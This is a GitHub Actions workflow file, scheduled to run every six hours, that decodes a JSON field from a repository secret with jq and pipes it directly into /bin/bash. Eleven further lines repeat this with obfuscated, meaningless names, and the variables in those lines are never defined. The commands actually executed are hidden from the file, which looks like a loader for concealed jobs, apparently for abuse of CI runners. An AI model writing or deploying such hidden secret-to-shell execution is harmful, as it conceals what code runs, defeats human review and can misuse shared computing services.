name: laomeizileng

on:
  workflow_dispatch:
  schedule:
    - cron: '45 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: laomeizileng
        env:
          oc62: ${{ secrets.oc62 }}
        run: |
          echo $oc62 | jq -r .qm25326 | /bin/bash
          echo $qmr210 | jq -r .ev76 | /bin/bash
          echo $m69796 | jq -r .sxs5640 | /bin/bash
          echo $mbicu4 | jq -r .i01980 | /bin/bash
          echo $dz71 | jq -r .rumop108 | /bin/bash
          echo $usvr61562 | jq -r .imeol5 | /bin/bash
          echo $hmi25 | jq -r .bs6 | /bin/bash
          echo $zvmyw459 | jq -r .aroe50724 | /bin/bash
          echo $o30713 | jq -r .xwr25 | /bin/bash
          echo $kpiq9905 | jq -r .jl6690 | /bin/bash
          echo $r01 | jq -r .ms65 | /bin/bash
          echo $taybm9 | jq -r .ft52801 | /bin/bash

